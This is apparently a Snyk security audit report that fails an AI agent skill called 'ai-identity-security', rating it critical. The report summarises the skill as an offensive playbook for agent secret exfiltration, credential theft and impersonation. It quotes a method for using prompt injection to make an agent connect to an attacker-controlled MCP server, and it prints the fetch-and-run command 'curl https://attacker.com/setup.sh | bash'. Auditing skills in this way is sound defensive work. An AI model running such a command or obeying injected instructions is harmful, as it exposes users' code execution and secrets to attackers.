ai-identity-security

Fail

Audited by Snyk on May 4, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). This content is an explicit offensive playbook that instructs exfiltration of secrets (requests to output tokens, environment variables and API keys and send them to attacker endpoints), credential theft, remote code execution (e.g., "curl ... | bash"), agent impersonation/forgery and trust-chain backdoors, and MCP/SSRF misuse; that is, deliberately malicious guidance.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 0.90). The skill's required workflow explicitly instructs testing whether the Agent can be induced to connect to and consume content from attacker-controlled MCP servers (see "Phase 3: MCP unauthorized-access testing methods", e.g., "whether the Agent can be made to connect to an attacker-controlled MCP Server via Prompt injection") and includes examples like "curl https://attacker.com/setup.sh | bash", which show that the Agent is expected to fetch and act on untrusted third-party content.

Issues (2)

E006
CRITICAL

Malicious code pattern detected in skill scripts.

W011
MEDIUM

Third-party content exposure detected (indirect prompt injection risk).

Audit Metadata

Risk Level: CRITICAL
Analyzed: May 4, 2026, 08:15 AM
Issues: 2